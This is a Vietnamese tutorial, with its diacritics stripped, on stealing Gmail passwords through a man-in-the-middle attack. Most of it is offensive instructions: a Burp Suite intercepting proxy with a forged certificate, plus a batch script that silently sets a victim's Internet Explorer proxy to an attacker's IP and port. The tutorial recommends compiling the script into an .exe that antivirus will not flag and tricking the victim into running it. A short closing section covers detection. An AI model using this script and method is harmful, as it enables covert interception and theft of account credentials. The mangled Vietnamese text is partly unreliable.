hack password cua gmail

Upload: gy-tien

Post on 17-Jul-2015

217 views

Category:

Documents


0 download

TRANSCRIPT

K thut hack password Gmail Trong bi vit ny ti s trnh by vi cc bn k thut Hack Password ca Gmail hay cc trang web khc xc thc mt cch tng t (SSL Certificate HTTPS). i vi nguy c bn c th b l Password Gmail, trong bi vit ny ti s trnh by cch nhn bit v ngn chn nguy c ny. I. Hiu bit chung - Gmail hay nhng dch v web khc thng s dng HTTPS m ha gi tin User/Pass. Khi trnh duyt web s dng Certificate ca Gmail cung cp v m ha th gi tin User/Pass khi i trn mng s an ton mc (gn nh tuyt i). - K h y l th no m li c th Hack c pass ca nhng phng thc xc thc v m ha c tnh bo mt cao. Qu trnh xc thc bnh thng khi ngi dng truy cp Gmail:

Bc 1: Ngi dng truy cp gmail.com Bc 2: Gmail s gi thng tin ti Versign ly Certificate Bc 3: Versign gi li cho Gmail Certificate bao gm: Public Key v Private key Bc 4: Gmail gi li cho ngi dng Public Key m ha thng tin xc thc Bc 5: Ngi dng s dng Public Key m ha gi ln Gmail Bc 6: Gmail s dng Private key gii m *note: gi tin m ha user/pass ngi dng gi ln gmail c m ha bng public key th ch c private key mi gii m dc. Trong khi Private key c Gmail d li v khng truyn trn mng. Nn gi tin ny cc k bo mt v khng c kh nng gii m

K thut gi mo Certifcate Ngi dng vo Gmail s khng i thng m i qua mt Intercepting Proxy v b gi mo Certificate

Bc 1: Ngi dng vo Gmail Bc 2: Khi gi tin t ngi dng vo Intercept proxy n s chnh sa thng tin v gi ln Gmail Bc 3: Gmail gi yu cu ln Versign sinh Certificate Bc 4: Verisign gi Certificate v cho Gmail. Gmail d li Private key v gi cho ngi yu cu Public key Bc 5: Gmail gi Public key cho Intercept Proxy, Key ny s khng c gi cho ngi dng Bc 6: Intercept Proxy t ra mt cp key v gi Public key v cho ngi dng Bc 7: ngi dng s dng Public Key gi ny do Proxy sinh ra m ha user/pass v gi ln cho proxy. Proxy do t sinh ra cp key nn s c Private key gii m. Bc 8: Sau khi gii m c gi tin ngi dng truyn ln Proxy s s dng Public Key ca Gmail gi cho ri m ha gi ln gmail v qu trnh xc thc vn dc thc hin *Note: Khi nu k tn cng ng trn con Intercept Proxy th hon ton c th bit c User/Pass ca ngi dng. Ngi dng khng ch khi i qua mt Intercept proxy th user/pass hon ton c th b l, mc d s dng cc phng thc xc thc rt bo mt

II.

Tools s dng - Burpsuite_v1.3 Link download: http://www.portswigger.net/suite/burpsuite_v1.3.zip y l mt tools c tnh nng l mt Intercept Proxy Java (Burpsuite l file .jar chy trn nn Java) Link download: http://sun.com IE, Firefox Tools thit lp Proxy bng mt file y l tools ti t vit dng file .bat hoc cc bn c th chuyn file.bat sang file.exe khi ngi dng kch vo file ny s t ng thit lp Proxy - Quick_Batch_File_Compiler_3.21 l mt tools chuyn file.bat file.exe K thut ly Password Gmail Cch thng thng nht l s dng Keylogger nhng cch ny khng s dng c khi c cc chng trnh dit virus mnh. - Export thng tin t trnh duyt web nh IE, Firefox. Cch ny khng thc hin c khi ngi dng khng lu User/Pass trn trnh duyt - Cn mt cch l gi mo Certificate v s dng Intercept Proxy a. t proxy cho ngi dng ton b ni dung ngi dng truy cp web i qua Intercept Proxy th cn phi thit lp proxy trn trnh duyt ca ngi dngj Cch thit lp c th bn thit lp bng tay (bng mt cch no c quyn iu khin my tnh ca nn nhn) Hng ngi dng chy mt file.exe m do chng ta vit thit lp proxy ******** To ra mt file.bat vi ni dung:echo Windows Registry Editor Version 5.00 > 1 echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2 echo "MigrateProxy"=dword:00000001 > 3 echo "ProxyEnable"=dword:00000001 > 4 echo "ProxyHttp1.1"=dword:00000000 > 5 echo "ProxyServer"="IP:port" > 6 echo "ProxyOverride"="" > 7 copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg del 1 /f /q del 2 /f /q del 3 /f /q del 4 /f /q

III.

del 5 /f /q del 6 /f /q del 7 /f /q regedit.exe /s b.reg del b.reg /f /q

-

-

******** Sau dng tools Quick_Batch_File_Compiler_3.21 chuyn file.bat ny sang file.exe Khi ngi dng nhn vo file ny s t ng thit lp proxy cho IE vi IP bn thay bng IP bn cn thit lp, Port l port ca Proxy s dng. iu rt hay l file ny tt c cc chng trnh dit virus u khng coi l Virus Trong bi vit ny ti s dng mt my tnh nn proxy ti thit lp trn trnh duyt l 127.0.0.1 b. Tit hnh Bc 1: Ci t Java Bc 2: Chy Burpsuite Bc 3: Thit lp Proxy Bc 4: Truy cp Gmail Bc 5: Vo Proxy xem thng tin User/Pass Bc 1: Ci t Java

-

-

Sau khi bn download b ci Java t trang sun.com bn ci t chun b mi trng cho cc chng trnh chy trn mi trng Java Bc 2: Chy Burpsuite Sau khi download Burpsuite tin hnh gii nn khi n file .jar th dng li Chy chng trnh Burpsuite_v1.3 lm Intercepting Proxy. Nhn p vo file .jar gii nn t b download c

Chy chng trnh Burpsuite

Mc nh chng trnh ny ch lm proxy cho chnh my chy chng trnh, cc my khc c th s dng chng trnh ny lm proxy phi Vo tab proxy chn Options ri c th Edit ty bin port s dng (mc nh l 8080) b du check box loopback ony

Chuyn sang tab Intercept cu hnh cc mode hot ng ca Intercepting proxy Ch Intercept on: y l ch hot ng. Nu mt ngi t my tnh ny lm proxy th ton b qu trnh truy cp ra internet u b proxy ny qun l. Khi mt request t trnh duyt ti Proxy, n s pht hin ni dung c th chnh sa v forward i th mi ti my ch web Chng ta tt ch ny bng cch nhn vo Intercept on s thnh off. Mc ch khi ngi dng s dng phn mm ny lm proxy th vn c th vo Internet bnh thng. ch ny ch lu li cc thng tin ngi dng truy cp web

-

Bc 3: t Proxy Vo IE chnh proxy vo a ch 127.0.0.1 port 8080. IE IE options tab connection nhn vo nt LAN Settings Hoc chy file.bat vi ni dung nh trn Dng tools chuyn file.bat file.exe ri chy file.exe ny cng c

Bc 4: Vo Gmail qua IE ( thit lp Proxy) Truy cp vo Gmail s thy thng bo Certificate li nhn continue tip tc

Tip tc google s thng bo Certificate Error bn vn g Username password truy cp vo Mail

Ti vo c mail vn cn thng bo Certificate Error

Bc 5: Vo Proxy tm thng tin Username v Pass Vo Burpsuite Chuyn sang tab Target Chn Site Map La chn trang web https://www.google.com Vo mc Accounts Vo mc ServiceLoginAuth Nhn chuyn sang bn phi chn Request (thng tin gi ln server) vo mc Raw chng ta s thy thng tin Username v Passwor

IV.

Pht hin v bo mt cho Account Gmail Mun hack password gmail k tn cng phi hng ngi dng t Proxy i qua mt Intercept Proxy sau gi mo Certificate do mun pht hin v bo mt cho Account Gmail bn c th thc hin bng cc cch: 1. Pht hin khi vo mng c qua mt Proxy hay khng Kim tra bng cch trc khi vo Internet truy cp vo mc thit lp Proxy xem c a ch no c thit lp hay cha. Cch ny rt hu ch nhng xem ra c phn rm r kh thc hin v d b qun hay b qua 2. Pht hin Certificate b gi mo a. Khi truy cp bnh thng + Vo Gmail s khng bt ra nhng pop-up xut download Certificate + Nhn chut vo biu tng cc kha view Certifcate s thy n c sinh ra t Verisign

b. Khi truy cp i qua mt Intercept Proxy + Truy cp vo Gmail s xut hin ca s ny thng bo Certificate ca bn b li c tip tc hay khng. Nu thy biu tng ny khuyn co ngi dng khng nn tip tc v kim tra li an ton ca mng v my tnh trc khi truy cp

+ Nu ngi dng tip tc truy cp vo trang Gmail s khng c biu tng cc kha m thay vo l biu tng Certificate Error. + Nhn xem Certificate ny chng ta s thy Certificate ny khng phi do Verisign sinh ra

Note: Nu ngi dng thy hai yu t ny khuyn co khng nn tip tc vo Gmail v Username v password ca bn hon ton c th b mt. Ngoi ra ngi dng khng nn lu mt khu t ng truy cp bi khi my tnh ri vo tay ngi khc th thng tin cn lu li trn IE, Firefox hon toan c th b khai thc d dng. Ngi dng cng nn ci t cc chng trnh dit Virus ngn chn cc loi Virus, Keylogger n chm mt khu.